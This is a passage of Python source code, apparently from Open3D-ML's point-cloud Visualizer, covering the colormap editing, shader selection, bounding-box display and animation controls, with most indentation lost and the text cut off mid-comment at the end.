h.add_fixed(0.25 * em)
h.add_child(self._add)
h.add_stretch()
self.widget.add_fixed(0.5 * em)
self.widget.add_child(h)
self.widget.add_fixed(0.5 * em)
def set_on_changed(self, callback): # takes no args, no return value
self._on_changed = callback
"""Updates the colormap based on the minimum and maximum values passed."""
def update(self, colormap, min_val, max_val):
self.colormap = colormap
self._min_value = min_val
self._max_value = max_val
self._min_label.text = str(min_val)
self._max_label.text = str(max_val)
if self._min_value >= self._max_value:
self._max_value = self._min_value + 1.0
self._edit.clear()
self._itemid2idx = {}
root_id = self._edit.get_root_item()
for i in range(0, len(self.colormap.points)):
p = self.colormap.points[i]
color = gui.Color(p.color[0], p.color[1], p.color[2])
val = min_val + p.value * (max_val - min_val)
cell = gui.ColormapTreeCell(val, color, None, None)
cell.color_edit.set_on_value_changed(
self._make_on_color_changed(i, self._on_color_changed))
cell.number_edit.set_on_value_changed(
self._make_on_value_changed(i, self._on_value_changed))
item_id = self._edit.add_item(root_id, cell)
self._itemid2idx[item_id] = i
self._update_buttons_enabled()
def _make_on_color_changed(self, idx, member_func):
def on_changed(color):
member_func(idx, color)
return on_changed
def _on_color_changed(self, idx, gui_color):
self.colormap.points[idx].color = [
gui_color.red, gui_color.green, gui_color.blue
]
if self._on_changed is not None:
self._on_changed()
def _make_on_value_changed(self, idx, member_func):
def on_changed(value):
member_func(idx, value)
return on_changed
def _on_value_changed(self, idx, value):
value = (value - self._min_value) / (self._max_value -
self._min_value)
needs_update = False
value = min(1.0, max(0.0, value))
if ((idx > 0 and value < self.colormap.points[idx - 1].value) or
(idx < len(self.colormap.points) - 1 and
value > self.colormap.points[idx + 1].value)):
self.colormap.points[idx].value = value
o = self.colormap.points[idx]
self.colormap.points.sort(key=lambda cmap_pt: cmap_pt.value)
for i in range(0, len(self.colormap.points)):
if self.colormap.points[i] is o:
idx = i
break
needs_update = True
            if idx > 0 and value == self.colormap.points[idx - 1].value:
                # guard the idx + 1 access below: only look up if a next point exists
                if idx < len(self.colormap.points) - 1:
upper = self.colormap.points[idx + 1].value
else:
upper = 1.0
value = value + 0.5 * (upper - value)
needs_update = True
            if (idx < len(self.colormap.points) - 1 and
                    value == self.colormap.points[idx + 1].value):
if idx > 0:
lower = self.colormap.points[idx - 1].value
else:
lower = 0.0
value = lower + 0.5 * (value - lower)
needs_update = True
self.colormap.points[idx].value = value
if needs_update:
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _on_selection_changed(self, item_id):
self._update_buttons_enabled()
def _on_delete(self):
if len(self.colormap.points) > 2:
idx = self._itemid2idx[self._edit.selected_item]
                self.colormap.points = (self.colormap.points[:idx] +
                                        self.colormap.points[idx + 1:])
del self._itemid2idx[self._edit.selected_item]
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _on_add(self):
if self._edit.selected_item in self._itemid2idx: # maybe no selection
idx = self._itemid2idx[self._edit.selected_item]
if idx < len(self.colormap.points) - 1:
lower = self.colormap.points[idx]
upper = self.colormap.points[idx + 1]
else:
lower = self.colormap.points[len(self.colormap.points) - 2]
upper = self.colormap.points[len(self.colormap.points) - 1]
add_idx = min(idx + 1, len(self.colormap.points) - 1)
new_value = lower.value + 0.5 * (upper.value - lower.value)
new_color = [
0.5 * lower.color[0] + 0.5 * upper.color[0],
0.5 * lower.color[1] + 0.5 * upper.color[1],
0.5 * lower.color[2] + 0.5 * upper.color[2]
]
new_point = Colormap.Point(new_value, new_color)
self.colormap.points = self.colormap.points[:add_idx] + [
new_point
] + self.colormap.points[add_idx:]
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _update_buttons_enabled(self):
if self._edit.selected_item in self._itemid2idx:
self._delete.enabled = len(self.colormap.points) > 2
self._add.enabled = True
else:
self._delete.enabled = False
self._add.enabled = False
def _update_later(self):
def update():
self.update(self.colormap, self._min_value, self._max_value)
self._window.post_redraw() # need to manually request redraw
gui.Application.instance.post_to_main_thread(self._window, update)
class ProgressDialog:
"""This class is used to manage the progress dialog displayed during visualization.
Initialize the class.
**Args:**
title: The title of the dialog box.
window: The window where the progress dialog box should be displayed.
n_items: The maximum number of items.
"""
def __init__(self, title, window, n_items):
self._window = window
self._n_items = n_items
em = window.theme.font_size
self.dialog = gui.Dialog(title)
self._label = gui.Label(title + " ")
self._layout = gui.Vert(0, gui.Margins(em, em, em, em))
self.dialog.add_child(self._layout)
self._layout.add_child(self._label)
self._layout.add_fixed(0.5 * em)
self._progress = gui.ProgressBar()
self._progress.value = 0.0
self._layout.add_child(self._progress)
"""Set the label text on the dialog box."""
def set_text(self, text):
self._label.text = text + " "
"""Post updates to the main thread."""
def post_update(self, text=None):
if text is None:
gui.Application.instance.post_to_main_thread(
self._window, self.update)
else:
def update_with_text():
self.update()
self._label.text = text
gui.Application.instance.post_to_main_thread(
self._window, update_with_text)
"""Enumerate the progress in the dialog box."""
def update(self):
value = min(1.0, self._progress.value + 1.0 / self._n_items)
self._progress.value = value
SOLID_NAME = "Solid Color"
LABELS_NAME = "Label Colormap"
RAINBOW_NAME = "Colormap (Rainbow)"
GREYSCALE_NAME = "Colormap (Greyscale)"
COLOR_NAME = "RGB"
X_ATTR_NAME = "x position"
Y_ATTR_NAME = "y position"
Z_ATTR_NAME = "z position"
def __init__(self):
self._objects = None
self._name2treenode = {}
self._name2treeid = {}
self._treeid2name = {}
self._attrname2lut = {}
self._colormaps = {}
self._shadername2panelidx = {}
self._gradient = rendering.Gradient()
self._scalar_min = 0.0
self._scalar_max = 1.0
self._animation_frames = []
self._last_animation_time = time.time()
self._animation_delay_secs = 0.100
self._consolidate_bounding_boxes = False
self._dont_update_geometry = False
def _init_dataset(self, dataset, split, indices):
self._objects = DatasetModel(dataset, split, indices)
def _init_data(self, data):
self._objects = DataModel(data)
def _init_user_interface(self, title, width, height):
self.window = gui.Application.instance.create_window(
title, width, height)
self.window.set_on_layout(self._on_layout)
em = self.window.theme.font_size
self._3d = gui.SceneWidget()
self._3d.enable_scene_caching(True) # makes UI _much_ more responsive
self._3d.scene = rendering.Open3DScene(self.window.renderer)
self.window.add_child(self._3d)
self._panel = gui.Vert()
self.window.add_child(self._panel)
indented_margins = gui.Margins(em, 0, em, 0)
# View controls
ctrl = gui.CollapsableVert("Mouse Controls", 0, indented_margins)
arcball = gui.Button("Arcball")
arcball.set_on_clicked(self._on_arcball_mode)
arcball.horizontal_padding_em = 0.5
arcball.vertical_padding_em = 0
fly = gui.Button("Fly")
fly.set_on_clicked(self._on_fly_mode)
fly.horizontal_padding_em = 0.5
fly.vertical_padding_em = 0
reset = gui.Button("Re-center")
reset.set_on_clicked(self._on_reset_camera)
reset.horizontal_padding_em = 0.5
reset.vertical_padding_em = 0
h = gui.Horiz(0.25 * em)
h.add_stretch()
h.add_child(arcball)
h.add_child(fly)
h.add_fixed(em)
h.add_child(reset)
h.add_stretch()
ctrl.add_child(h)
ctrl.add_fixed(em)
self._panel.add_child(ctrl)
# Dataset
model = gui.CollapsableVert("Dataset", 0, indented_margins)
vgrid = gui.VGrid(2, 0.25 * em)
model.add_child(vgrid)
model.add_fixed(0.5 * em)
bgcolor = gui.ColorEdit()
bgcolor.color_value = gui.Color(1, 1, 1)
self._on_bgcolor_changed(bgcolor.color_value)
bgcolor.set_on_value_changed(self._on_bgcolor_changed)
vgrid.add_child(gui.Label("BG Color"))
vgrid.add_child(bgcolor)
view_tab = gui.TabControl()
view_tab.set_on_selected_tab_changed(self._on_display_tab_changed)
model.add_child(view_tab)
# ... model list
self._dataset = gui.TreeView()
self._dataset.set_on_selection_changed(
self._on_dataset_selection_changed)
view_tab.add_tab("List", self._dataset)
# ... animation slider
v = gui.Vert()
view_tab.add_tab("Animation", v)
v.add_fixed(0.25 * em)
grid = gui.VGrid(2)
v.add_child(grid)
self._slider = gui.Slider(gui.Slider.INT)
self._slider.set_limits(0, len(self._objects.data_names))
self._slider.set_on_value_changed(self._on_animation_slider_changed)
grid.add_child(gui.Label("Index"))
grid.add_child(self._slider)
self._slider_current = gui.Label("")
grid.add_child(gui.Label("Showing"))
grid.add_child(self._slider_current)
v.add_fixed(em)
self._play = gui.Button("Play")
self._play.horizontal_padding_em = 0.5
self._play.vertical_padding_em = 0
self._play.set_on_clicked(self._on_start_animation)
h = gui.Horiz()
h.add_stretch()
h.add_child(self._play)
h.add_stretch()
v.add_child(h)
self._panel.add_child(model)
# Coloring
properties = gui.CollapsableVert("Properties", 0, indented_margins)
grid = gui.VGrid(2, 0.25 * em)
# ... data source
self._datasource_combobox = gui.Combobox()
self._datasource_combobox.set_on_selection_changed(
self._on_datasource_changed)
self._colormap_channel = gui.Combobox()
self._colormap_channel.add_item("0")
self._colormap_channel.set_on_selection_changed(
self._on_channel_changed)
h = gui.Horiz()
h.add_child(self._datasource_combobox)
h.add_fixed(em)
h.add_child(gui.Label("Index"))
h.add_child(self._colormap_channel)
grid.add_child(gui.Label("Data"))
grid.add_child(h)
# ... shader
self._shader = gui.Combobox()
self._shader.add_item(self.SOLID_NAME)
self._shader.add_item(self.LABELS_NAME)
self._shader.add_item(self.RAINBOW_NAME)
self._shader.add_item(self.GREYSCALE_NAME)
self._shader.add_item(self.COLOR_NAME)
self._colormaps[self.RAINBOW_NAME] = Colormap.make_rainbow()
self._colormaps[self.GREYSCALE_NAME] = Colormap.make_greyscale()
self._shader.selected_index = 0
self._shader.set_on_selection_changed(self._on_shader_changed)
grid.add_child(gui.Label("Shader"))
grid.add_child(self._shader)
properties.add_child(grid)
# ... shader panels
self._shader_panels = gui.StackedWidget()
panel_idx = 0
# ... sub-panel: single color
self._color_panel = gui.Vert()
self._shader_panels.add_child(self._color_panel)
self._shadername2panelidx[self.SOLID_NAME] = panel_idx
panel_idx += 1
self._color = gui.ColorEdit()
self._color.color_value = gui.Color(0.5, 0.5, 0.5)
self._color.set_on_value_changed(self._on_shader_color_changed)
h = gui.Horiz()
h.add_child(gui.Label("Color"))
h.add_child(self._color)
self._color_panel.add_child(h)
# ... sub-panel: labels
self._labels_panel = gui.Vert()
self._shader_panels.add_child(self._labels_panel)
self._shadername2panelidx[self.LABELS_NAME] = panel_idx
panel_idx += 1
self._label_edit = self.LabelLUTEdit()
self._label_edit.set_on_changed(self._on_labels_changed)
self._labels_panel.add_child(gui.Label("Labels"))
self._labels_panel.add_child(self._label_edit.widget)
# ... sub-panel: colormap
self._colormap_panel = gui.Vert()
self._shader_panels.add_child(self._colormap_panel)
self._shadername2panelidx[self.RAINBOW_NAME] = panel_idx
self._shadername2panelidx[self.GREYSCALE_NAME] = panel_idx
panel_idx += 1
self._colormap_edit = self.ColormapEdit(self.window, em)
self._colormap_edit.set_on_changed(self._on_colormap_changed)
self._colormap_panel.add_child(self._colormap_edit.widget)
# ... sub-panel: RGB
self._rgb_panel = gui.Vert()
self._shader_panels.add_child(self._rgb_panel)
self._shadername2panelidx[self.COLOR_NAME] = panel_idx
panel_idx += 1
self._rgb_combo = gui.Combobox()
self._rgb_combo.add_item("255")
self._rgb_combo.add_item("1.0")
self._rgb_combo.set_on_selection_changed(self._on_rgb_multiplier)
h = gui.Horiz(0.5 * em)
h.add_child(gui.Label("Max value"))
h.add_child(self._rgb_combo)
self._rgb_panel.add_child(h)
properties.add_fixed(em)
properties.add_child(self._shader_panels)
self._panel.add_child(properties)
# Populate tree, etc.
for name in self._objects.data_names:
self._add_tree_name(name)
self._update_datasource_combobox()
"""Set the LUT for a specific attribute.
**Args:**
attr_name: The attribute name as string.
lut: The LabelLUT object that should be updated.
"""
def set_lut(self, attr_name, lut):
self._attrname2lut[attr_name] = lut
"""Set up camera for visualization"""
def setup_camera(self):
selected_names = self._get_selected_names()
selected_bounds = [
self._objects.calc_bounds_for(n) for n in selected_names
]
min_val = [1e30, 1e30, 1e30]
max_val = [-1e30, -1e30, -1e30]
for b in selected_bounds:
for i in range(0, 3):
min_val[i] = min(min_val[i], b[0][i])
max_val[i] = max(max_val[i], b[1][i])
bounds = o3d.geometry.AxisAlignedBoundingBox(min_val, max_val)
self._3d.setup_camera(60, bounds, bounds.get_center())
"""Show geometry for a given node."""
def show_geometries_under(self, name, show):
prefix = name
for (n, node) in self._name2treenode.items():
if n.startswith(prefix):
self._3d.scene.show_geometry(n, show)
node.checkbox.checked = show
self._3d.force_redraw()
def _add_tree_name(self, name, is_geometry=True):
names = name.split("/")
parent = self._dataset.get_root_item()
for i in range(0, len(names) - 1):
n = "/".join(names[:i + 1]) + "/"
if n in self._name2treeid:
parent = self._name2treeid[n]
else:
                def on_parent_checked(checked, n=n):
                    self.show_geometries_under(n, checked)
cell = gui.CheckableTextTreeCell(n, True, on_parent_checked)
parent = self._dataset.add_item(parent, cell)
self._name2treenode[n] = cell
self._name2treeid[n] = parent
self._treeid2name[parent] = n
def on_checked(checked):
self._3d.scene.show_geometry(name, checked)
if self._is_tree_name_geometry(name):
# available attrs could change
self._update_datasource_combobox()
self._update_bounding_boxes()
self._3d.force_redraw()
cell = gui.CheckableTextTreeCell(names[-1], True, on_checked)
if is_geometry:
cell.label.text_color = gui.Color(1.0, 0.0, 0.0, 1.0)
node = self._dataset.add_item(parent, cell)
self._name2treenode[name] = cell
self._treeid2name[node] = name
self._slider.set_limits(0, len(self._objects.data_names) - 1)
if len(self._objects.data_names) == 1:
self._slider_current.text = name
def _load_geometry(self, name, ui_done_callback):
progress_dlg = Visualizer.ProgressDialog("Loading...", self.window, 2)
progress_dlg.set_text("Loading " + name + "...")
def load_thread():
result = self._objects.load(name)
progress_dlg.post_update("Loading " + name + "...")
gui.Application.instance.post_to_main_thread(
self.window, ui_done_callback)
gui.Application.instance.post_to_main_thread(
self.window, self.window.close_dialog)
self.window.show_dialog(progress_dlg.dialog)
threading.Thread(target=load_thread).start()
def _load_geometries(self, names, ui_done_callback):
# Progress has: len(names) items + ui_done_callback
progress_dlg = Visualizer.ProgressDialog("Loading...", self.window,
len(names) + 1)
progress_dlg.set_text("Loading " + names[0] + "...")
def load_thread():
for i in range(0, len(names)):
result = self._objects.load(names[i], True)
if i + 1 < len(names):
text = "Loading " + names[i + 1] + "..."
else:
text = "Creating GPU objects..."
progress_dlg.post_update(text)
if result:
self._name2treenode[names[i]].label.text_color = gui.Color(
0.0, 1.0, 0.0, 1.0)
else:
break
gui.Application.instance.post_to_main_thread(
self.window, ui_done_callback)
gui.Application.instance.post_to_main_thread(
self.window, self.window.close_dialog)
self.window.show_dialog(progress_dlg.dialog)
threading.Thread(target=load_thread).start()
def _update_geometry(self, check_unloaded=False):
if check_unloaded:
for name in self._objects.data_names:
if not self._objects.is_loaded(name):
self._3d.scene.remove_geometry(name)
material = self._get_material()
for n, tcloud in self._objects.tclouds.items():
self._update_point_cloud(n, tcloud, material)
if not tcloud.is_empty():
self._name2treenode[n].label.text_color = gui.Color(
0.0, 1.0, 0.0, 1.0)
if self._3d.scene.has_geometry(n):
self._3d.scene.modify_geometry_material(n, material)
else:
self._name2treenode[n].label.text_color = gui.Color(
1.0, 0.0, 0.0, 1.0)
self._name2treenode[n].checkbox.checked = False
self._3d.force_redraw()
def _update_point_cloud(self, name, tcloud, material):
if self._dont_update_geometry:
return
if tcloud.is_empty():
return
attr_name = self._datasource_combobox.selected_text
attr = None
flag = 0
attr = self._objects.get_attr(name, attr_name)
# Update scalar values
if attr is not None:
if len(attr.shape) == 1:
scalar = attr
else:
channel = max(0, self._colormap_channel.selected_index)
scalar = attr[:, channel]
else:
shape = [len(tcloud.point["points"].numpy())]
scalar = np.zeros(shape, dtype='float32')
tcloud.point["__visualization_scalar"] = Visualizer._make_tcloud_array(
scalar)
flag |= rendering.Scene.UPDATE_UV0_FLAG
# Update RGB values
if attr is not None and (len(attr.shape) == 2 and attr.shape[1] >= 3):
max_val = float(self._rgb_combo.selected_text)
if max_val <= 0:
max_val = 255.0
colors = attr[:, [0, 1, 2]] * (1.0 / max_val)
tcloud.point["colors"] = Visualizer._make_tcloud_array(colors)
flag |= rendering.Scene.UPDATE_COLORS_FLAG
# Update geometry
if self._3d.scene.scene.has_geometry(name):
self._3d.scene.scene.update_geometry(name, tcloud, flag)
else:
self._3d.scene.add_geometry(name, tcloud, material)
node = self._name2treenode[name]
if node is not None:
self._3d.scene.show_geometry(name, node.checkbox.checked)
def _get_material(self):
self._update_gradient()
material = rendering.Material()
if self._shader.selected_text == self.SOLID_NAME:
material.shader = "unlitSolidColor"
c = self._color.color_value
material.base_color = [c.red, c.green, c.blue, 1.0]
elif self._shader.selected_text == self.COLOR_NAME:
material.shader = "defaultUnlit"
material.base_color = [1.0, 1.0, 1.0, 1.0]
else:
material.shader = "unlitGradient"
material.gradient = self._gradient
material.scalar_min = self._scalar_min
material.scalar_max = self._scalar_max
return material
def _update_bounding_boxes(self, animation_frame=None):
        if len(self._attrname2lut) == 1:
            # grab the sole LUT without needing to know its key
            lut = next(iter(self._attrname2lut.values()))
elif "labels" in self._attrname2lut:
lut = self._attrname2lut["labels"]
elif "label" in self._attrname2lut:
lut = self._attrname2lut["label"]
else:
lut = None
mat = rendering.Material()
mat.shader = "unlitLine"
mat.line_width = 2 * self.window.scaling
if self._consolidate_bounding_boxes:
name = Model.bounding_box_prefix.split("/")[0]
boxes = []
# When consolidated we assume bbox_data.name is the geometry name.
if animation_frame is None:
for bbox_data in self._objects.bounding_box_data:
if bbox_data.name in self._name2treenode and self._name2treenode[
bbox_data.name].checkbox.checked:
boxes += bbox_data.boxes
else:
geom_name = self._animation_frames[animation_frame]
for bbox_data in self._objects.bounding_box_data:
if bbox_data.name == geom_name:
boxes = bbox_data.boxes
break
self._3d.scene.remove_geometry(name)
if len(boxes) > 0:
lines = BoundingBox3D.create_lines(boxes, lut)
self._3d.scene.add_geometry(name, lines, mat)
if name not in self._name2treenode:
self._add_tree_name(name, is_geometry=False)
self._3d.force_redraw()
else:
# Don't run this more than once if we aren't consolidating,
# because nothing will change.
if len(self._objects.bounding_box_data) > 0:
if self._objects.bounding_box_data[
0].name in self._name2treenode:
return
for bbox_data in self._objects.bounding_box_data:
lines = BoundingBox3D.create_lines(bbox_data.boxes, lut)
self._3d.scene.add_geometry(bbox_data.name, lines, mat)
for bbox_data in self._objects.bounding_box_data:
self._add_tree_name(bbox_data.name, is_geometry=False)
self._3d.force_redraw()
def _update_gradient(self):
if self._shader.selected_text == self.LABELS_NAME:
colors = self._label_edit.get_colors()
n = float(len(colors) - 1)
if n >= 1:
self._gradient.points = [
rendering.Gradient.Point(
float(i) / n, [
colors[i][0], colors[i][1], colors[i][2],
colors[i][3]
]) for i in range(0, len(colors))
]
else:
self._gradient.points = [
rendering.Gradient.Point(0.0, [1.0, 0.0, 1.0, 1.0])
]
self._gradient.mode = rendering.Gradient.LUT
else:
cmap = self._colormaps.get(self._shader.selected_text)
if cmap is not None:
self._gradient.points = [
rendering.Gradient.Point(
p.value, [p.color[0], p.color[1], p.color[2], 1.0])
for p in cmap.points
]
self._gradient.mode = rendering.Gradient.GRADIENT
def _update_geometry_colors(self):
material = self._get_material()
for name, tcloud in self._objects.tclouds.items():
if not tcloud.is_empty() and self._3d.scene.has_geometry(name):
self._3d.scene.modify_geometry_material(name, material)
self._3d.force_redraw()
def _update_datasource_combobox(self):
current = self._datasource_combobox.selected_text
self._datasource_combobox.clear_items()
available_attrs = self._get_available_attrs()
for attr_name in available_attrs:
self._datasource_combobox.add_item(attr_name)
if current in available_attrs:
self._datasource_combobox.selected_text = current
elif len(available_attrs) > 0:
self._datasource_combobox.selected_text = available_attrs[0]
else:
# If no attributes, two possibilities:
# 1) no geometries are selected: don't change anything
# 2) geometries are selected: color solid
has_checked = False
for n, node in self._name2treenode.items():
if node.checkbox.checked and self._is_tree_name_geometry(n):
has_checked = True
break
if has_checked:
self._set_shader(self.SOLID_NAME)
def _update_shaders_combobox(self):
current_attr = self._datasource_combobox.selected_text
current_shader = self._shader.selected_text
has_lut = (current_attr in self._attrname2lut)
is_scalar = True
selected_names = self._get_selected_names()
if len(selected_names) > 0 and len(
self._objects.get_attr_shape(selected_names[0],
current_attr)) > 1:
is_scalar = False
self._shader.clear_items()
if not is_scalar:
self._shader.add_item(self.COLOR_NAME)
if has_lut:
self._shader.add_item(self.LABELS_NAME)
self._label_edit.set_labels(self._attrname2lut[current_attr])
self._shader.add_item(self.RAINBOW_NAME)
self._shader.add_item(self.GREYSCALE_NAME)
self._shader.add_item(self.SOLID_NAME)
if current_shader == self.LABELS_NAME and has_lut:
self._set_shader(self.LABELS_NAME)
elif is_scalar:
self._set_shader(self.RAINBOW_NAME)
def _update_attr_range(self):
attr_name = self._datasource_combobox.selected_text
current_channel = self._colormap_channel.selected_index
self._scalar_min, self._scalar_max = self._objects.get_attr_minmax(
attr_name, current_channel)
if self._shader.selected_text in self._colormaps:
cmap = self._colormaps[self._shader.selected_text]
self._colormap_edit.update(
cmap, self._scalar_min, self._scalar_max)
def _set_shader(self, shader_name, force_update=False):
# Disable channel if we are using a vector shader. Always do this to
# ensure that the UI is consistent.
if shader_name == Visualizer.COLOR_NAME:
self._colormap_channel.enabled = False
else:
self._colormap_channel.enabled = True
if shader_name == self._shader.selected_text and not force_update:
return
self._shader.selected_text = shader_name
idx = self._shadername2panelidx[self._shader.selected_text]
self._shader_panels.selected_index = idx
if shader_name in self._colormaps:
cmap = self._colormaps[shader_name]
self._colormap_edit.update(
cmap, self._scalar_min, self._scalar_max)
self._update_geometry_colors()
def _on_layout(self, theme):
frame = self.window.content_rect
em = theme.font_size
panel_width = 20 * em
panel_rect = gui.Rect(frame.get_right() - panel_width, frame.y,
panel_width, frame.height - frame.y)
self._panel.frame = panel_rect
self._3d.frame = gui.Rect(frame.x, frame.y, panel_rect.x - frame.x,
frame.height - frame.y)
def _on_arcball_mode(self):
self._3d.set_view_controls(gui.SceneWidget.ROTATE_CAMERA)
def _on_fly_mode(self):
self._3d.set_view_controls(gui.SceneWidget.FLY)
def _on_reset_camera(self):
self.setup_camera()
def _on_dataset_selection_changed(self, item):
name = self._treeid2name[item]
if not self._is_tree_name_geometry(name):
return
def ui_callback():
self._update_attr_range()
self._update_geometry(check_unloaded=True)
self._update_bounding_boxes()
if not self._objects.is_loaded(name):
self._load_geometry(name, ui_callback)
def _on_display_tab_changed(self, index):
if index == 1:
self._animation_frames = self._get_selected_names()
self._slider.set_limits(0, len(self._animation_frames) - 1)
self._on_animation_slider_changed(self._slider.int_value)
# _on_animation_slider_changed() calls _update_bounding_boxes()
else:
for name, node in self._name2treenode.items():
self._3d.scene.show_geometry(name, node.checkbox.checked)
self._update_bounding_boxes()
def _on_animation_slider_changed(self, new_value):
idx = int(new_value)
for i in range(0, len(self._animation_frames)):
self._3d.scene.show_geometry(self._animation_frames[i], (i == idx))
self._update_bounding_boxes(animation_frame=idx)
self._3d.force_redraw()
self._slider_current.text = self._animation_frames[idx]
r = self._slider_current.frame
self._slider_current.frame = gui.Rect(r.x, r.y,
self._slider.frame.get_right(),
r.height)
def _on_start_animation(self):
def on_tick():
return self._on_animate()
self._play.text = "Stop"
self._play.set_on_clicked(self._on_stop_animation)
self._last_animation_time = 0.0
self.window.set_on_tick_event(on_tick)
def _on_animate(self):
now = time.time()
if now >= self._last_animation_time + self._animation_delay_secs:
idx = (self._slider.int_value + 1) % len(self._animation_frames)
self._slider.int_value = idx
self._on_animation_slider_changed(idx)
self._last_animation_time = now
return True
return False
def _on_stop_animation(self):
self.window.set_on_tick_event(None)
self._play.text = "Play"
self._play.set_on_clicked(self._on_start_animation)
def _on_bgcolor_changed(self, new_color):
bg_color = [
new_color.red, new_color.green, new_color.blue, new_color.alpha
]
self._3d.scene.set_background(bg_color)
self._3d.force_redraw()
def _on_datasource_changed(self, attr_name, idx):
selected_names = self._get_selected_names()
n_channels = 1
if len(selected_names) > 0:
shape = self._objects.get_attr_shape(selected_names[0], attr_name)
if len(shape) <= 1:
n_channels = 1
else:
n_channels = max(1, shape[1])
current_channel = max(0, self._colormap_channel.selected_index)
current_channel = min(n_channels - 1, current_channel)
self._colormap_channel.clear_items()
for i in range(0, n_channels):
self._colormap_channel.add_item(str(i))
self._colormap_channel.selected_index = current_channel
self._update_attr_range()
self._update_shaders_combobox()
# Try to intelligently pick a shader.
current_shader = self._shader.selected_text
if current_shader == Visualizer.SOLID_NAME:
pass
elif attr_name in self._attrname2lut:
self._set_shader(Visualizer.LABELS_NAME)
elif attr_name == "colors":
self._set_shader(Visualizer.COLOR_NAME)
elif n_channels >= 3:
self._set_shader(Visualizer.RAINBOW_NAME)
elif current_shader == Visualizer.COLOR_NAME: # vector -> scalar
self._set_shader(Visualizer.RAINBOW_NAME)
else: # changing from one scalar to another, don't change
pass
self._update_geometry()
def _on_channel_changed(self, name, idx):
self._update_attr_range()
self._update_geometry() # need to recompute scalars array
def _on_shader_changed(self, name, idx):
        # _shader.selected_text is already name, so we need to force an update
self._set_shader(name, force_update=True)
def _on_shader_color_changed(self, color):
self._update_geometry_colors()
def _on_labels_changed(self):
self._update_geometry_colors()
def _on_colormap_changed(self):
self._colormaps[
self._shader.selected_text] = self._colormap_edit.colormap
self._update_geometry_colors()
def _on_rgb_multiplier(self, text, idx):
self._update_geometry()
def _get_selected_names(self):
# Note that things like bounding boxes could be in the tree, and we
# do not want to include them in the list of things selected, even if
# they are checked.
selected_names = []
for n in self._objects.data_names:
if self._name2treenode[n].checkbox.checked:
selected_names.append(n)
return selected_names
def _get_available_attrs(self):
selected_names = self._get_selected_names()
return self._objects.get_available_attrs(selected_names)
def _is_tree_name_geometry(self, name):
return (name in self._objects.data_names)
@staticmethod
def _make_tcloud_array(np_array, copy=False):
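        # o3d.core.Tensor(np_array) makes a copy, while Tensor.from_numpy()
        # shares memory with the numpy array and requires it to be
        # C-contiguous, hence the contiguity check below.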
if copy or not np_array.data.c_contiguous:
return o3d.core.Tensor(np_array)
else:
return o3d.core.Tensor.from_numpy(np_array)
def visualize_dataset(self,
dataset,
split,
label_lut=None,
indices=None,
width=1024,
height=768):
"""Visualize a dataset.
**Example:**
Minimal example for visualizing a dataset::
import open3d.ml.torch as ml3d # or open3d.ml.tf as ml3d
dataset = ml3d.datasets.SemanticKITTI(dataset_path='/path/to/SemanticKITTI/')
vis = ml3d.vis.Visualizer()
vis.visualize_dataset(dataset, 'all', indices=range(100))
        **Args:**
            dataset: The dataset to use for visualization.
            split: The dataset split to be used, such as 'training'.
            label_lut: An optional LabelLUT with the label names and colors;
                if None, one is built from dataset.label_to_names.
            indices: An iterable with a subset of the data points to visualize, such as [0,2,3,4].
            width: The width of the visualization window.
            height: The height of the visualization window.
        """
# Setup the labels
if label_lut is None:
lut = LabelLUT()
for key, val in (dataset.label_to_names.items()):
lut.add_label(val, key)
self.set_lut("labels", lut)
else:
self.set_lut("labels", label_lut)
self._consolidate_bounding_boxes = True
self._init_dataset(dataset, split, indices)
self._visualize("Open3D - " + dataset.name, width, height)
def visualize(self,
data,
lut=None,
bounding_boxes=None,
width=1024,
height=768):
"""Visualize a custom point cloud data.
**Example:**
Minimal example for visualizing a single point cloud with an
attribute::
import numpy as np
import open3d.ml.torch as ml3d
# or import open3d.ml.tf as ml3d
data = [ {
'name': 'my_point_cloud',
'points': np.random.rand(100,3).astype(np.float32),
'point_attr1': np.random.rand(100).astype(np.float32),
} ]
vis = ml3d.vis.Visualizer()
vis.visualize(data)
        **Args:**
            data: A list of dictionaries. Each dictionary is a point cloud with
                attributes. Each dictionary must have the entries 'name' and
                'points'. Points and point attributes can be passed as numpy
                arrays, PyTorch tensors or TensorFlow tensors.
            lut: An optional LabelLUT applied to the 'labels' attribute.
            bounding_boxes: An optional list of bounding boxes to display;
                long lists are combined into groups to keep the UI responsive.
            width: window width.
            height: window height.
        """
self._init_data(data)
if lut is not None:
self.set_lut("labels", lut)
if bounding_boxes is not None:
prefix = Model.bounding_box_prefix
            # Filament crashes if there are too many items, and hundreds of
            # items are unwieldy in a list anyway, so combine boxes into
            # groups if there are too many.
group_size = int(math.floor(float(len(bounding_boxes)) / 100.0))
if group_size < 2:
box_data = [
Model.BoundingBoxData(prefix + str(bbox), [bbox])
for bbox in bounding_boxes
]
else:
box_data = []
current_group = []
n = len(bounding_boxes)
for i in range(0, n):
current_group.append(bounding_boxes[i])
if len(current_group) >= group_size or i == n - 1:
if i < n - 1:
name = prefix + "Boxes " + str(
i + 1 - group_size) + " - " + str(i)
else:
if len(current_group) > 1:
name = prefix + "Boxes " + str(
i + 1 - len(current_group)) + " - " + str(i)
else:
name = prefix + "Box " + str(i)
data = Model.BoundingBoxData(name, current_group)
box_data.append(data)
current_group = []
self._objects.bounding_box_data = box_data
self._visualize("Open3D", width, height)
def _visualize(self, title, width, height):
gui.Application.instance.initialize()
self._init_user_interface(title, width, height)
self._3d.scene.downsample_threshold = 400000
# Turn all the objects off except the first one
for name, node in self._name2treenode.items():
node.checkbox.checked = False
self._3d.scene.show_geometry(name, False)
for name in [self._objects.data_names[0]]:
self._name2treenode[name].checkbox.checked = True
self._3d.scene.show_geometry(name, True)
def on_done_ui():
# Add bounding boxes here: bounding boxes belonging to the dataset
# will not be loaded until now.
self._update_bounding_boxes()
self._update_datasource_combobox()
self._update_shaders_combobox()
# Display "colors" by default if available, "points" if not
available_attrs = self._get_available_attrs()
self._set_shader(self.SOLID_NAME, force_update=True)
if "colors" in available_attrs:
self._datasource_combobox.selected_text = "colors"
elif "points" in available_attrs:
self._datasource_combobox.selected_text = "points"
self._dont_update_geometry = True
self._on_datasource_changed(
self._datasource_combobox.selected_text,
self._datasource_combobox.selected_index)
self._update_geometry_colors()
self._dont_update_geometry = False
# _datasource_combobox was empty, now isn't, re-layout.
self.window.set_needs_layout()
self._update_geometry()
self.setup_camera()
self._load_geometries(self._objects.data_names, on_done_ui)
gui.Application.instance.run()
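# A minimal, self-contained sketch of the bounding-box grouping logic used in
# visualize() above, assuming plain Python lists. The name group_boxes is
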